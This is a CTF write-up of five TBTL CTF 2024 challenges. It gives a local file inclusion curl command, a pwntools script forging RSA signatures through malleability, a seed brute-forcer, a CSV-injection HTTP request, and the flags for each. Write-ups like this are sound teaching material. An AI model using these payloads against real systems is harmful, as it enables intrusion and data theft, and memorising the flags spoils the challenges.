TBTL CTF 2024

solver by replican and gr3yr4t

archive dump chall : https://github.com/blockhousetech/TBTL-CTF/tree/master/2024/

Chall	Category	Total Solved
Butterfly	Web
Talk to you	Web
Wikipedia signatures	Crypto
Flagcheck	Reverse
Rnd For Data Science	Web

Butterfly

flag from indexed db : U2FsdGVkX19wWL7itIL7TZcLTP/e1ulrZolI9AHTA8OBGOCodbZKdOxPF41rGV9C+X7PZPt9ISJKQMpTl+Fwew==

{"code":"CryptoJS.AES.decrypt(CIPHERTEXT, KEY).toString(CryptoJS.enc.Utf8)"} ( kita dapetin dari session ) kita asumsi bahwa flagnya nanti memakai function ini tinggal cari secretnya

secret ada di session lgsg aja

CryptoJS.AES.decrypt('U2FsdGVkX19wWL7itIL7TZcLTP/e1ulrZolI9AHTA8OBGOCodbZKdOxPF41rGV9C+X7PZPt9ISJKQMpTl+Fwew==', 'secret key is very secure').toString(CryptoJS.enc.Utf8)

flag : TBTL{th15_1S_n0t_53CUR3_5T0r4G3}

Talk to you

lfi on the page , first we use ../flag.txt and the site said the flag in database.sqlite so we change the parameter and we get the flag

curl "https://tbtl-talk-to-you.chals.io/?page=database.sqlite" --output file

TBTL{4Typ1c41_d4T4B453_u54g3}

Wikipedia signatures

The exploits here are always around the fact that you can give texts that have the same modulus with N as the goal

Here however they forbid all payloads of the form pt + a*N

However we can simply do (N-pt)

As we know that (N-pt)^e = -C (mod N)

So taking -(-C) (mod N) gives us what we need and supplying that decrypts it successfully

from Crypto.Util.number import *
from pwn import *

conn = remote('0.cloud.chals.io', 31148)
conn.recvuntil(b'(')

n = int(conn.recvuntil(b',').decode()[:-1])
print(n)

e = int(conn.recvuntil(b')').decode()[:-1])
print(e)

conn.recvline()
conn.recvline()
conn.recvline()
conn.recvline()

print(conn.recvuntil(b'> '))

TARGET = b'I challenge you to sign this message!'
pt = bytes_to_long(TARGET)

print(pt)

rev_t = n-pt

payload = "2 " + str(rev_t)
print(payload)
conn.sendline(payload.encode())

res = int(conn.recvline().decode().strip("\r\n"))
print(res)

rev_res = n-res
print(rev_res)

payload = "1 " + str(rev_res)
print(payload)
conn.sendline(payload.encode())
print(conn.recvall())

conn.close()

TBTL{r3p347_4f73r_m3-d16174l_516n47ur3_15_n07_3ncryp710n}

Flagcheck

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

unsigned char dt[] = {0x33,0x00,0x00,0x00,0x84,0x00,0x00,0x00,0x3d,0x00,0x00,0x00,0x3f,0x00,0x00,0x00,0x2a,0x00,0x00,0x00,0x93,0x00,0x00,0x00,0x7b,0x00,0x00,0x00,0x82,0x00,0x00,0x00,0x1a,0x00,0x00,0x00,0xac,0x00,0x00,0x00,0x8e,0x00,0x00,0x00,0xf4,0x00,0x00,0x00,0xb1,0x00,0x00,0x00,0xcb,0x00,0x00,0x00,0x8d,0x00,0x00,0x00,0x21,0x00,0x00,0x00,0x0e,0x00,0x00,0x00,0xb7,0x00,0x00,0x00,0x67,0x00,0x00,0x00,0x96,0x00,0x00,0x00,0x2c,0x00,0x00,0x00,0x81,0x00,0x00,0x00,0xd3,0x00,0x00,0x00,0xbc,0x00,0x00,0x00,0x29,0x00,0x00,0x00,0x6c,0x00,0x00,0x00,0x4b,0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xed,0x00,0x00,0x00,0xfd,0x00,0x00,0x00,0xee,0x00,0x00,0x00,0x56,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x52,0x00,0x00,0x00,0xd5,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x6d,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x3e,0x00,0x00,0x00,0x7a,0x00,0x00,0x00,0x1b,0x00,0x00,0x00,0x69,0x00,0x00,0x00,0x23,0x00,0x00,0x00,0x1f,0x00,0x00,0x00,0xb6,0x00,0x00,0x00,0x1d,0x00,0x00,0x00,0xbc,0x00,0x00,0x00,0x98,0x00,0x00,0x00,0xd1,0x00,0x00,0x00,0xa6,0x00,0x00,0x00,0x83,0x00,0x00,0x00,0xe9,0x00,0x00,0x00,0xeb,0x00,0x00,0x00,0x13,0x00,0x00,0x00,0x21,0x00,0x00,0x00,0x3d,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x2b,0x00,0x00,0x00,0x79,0x00,0x00,0x00,0x53,0x00,0x00,0x00,0x4f,0x00,0x00,0x00,0xa1,0x00,0x00,0x00};

int main() {
    srand(time(NULL));
    for (int x = 0; x < 255; x++) {
        srand(x);
        char tmp[64] = {0};
        for (int i = 0; i < 0x3f; i++) {
            tmp[i] = dt[i*4] ^ (rand() % 0x100);
        }
        if (strstr(tmp, "TBTL") != NULL) {
            printf("%s\n", tmp);
            break;
        }
    }
    return 0;
}

Rnd For Data Science

csv injection payload: ,delimiter,#

POST /generate HTTP/1.1
Host: tbtl-rnd-for-data-science.chals.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: https://tbtl-rnd-for-data-science.chals.io
Referer: https://tbtl-rnd-for-data-science.chals.io/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

numColumns=3&columnName0=%2cdelimiter%2c%23&columnName1=b&columnName2=c&delimiter=%20

TBTL{d4T4_5c13nc3_15_n07_f0r_r0ck135}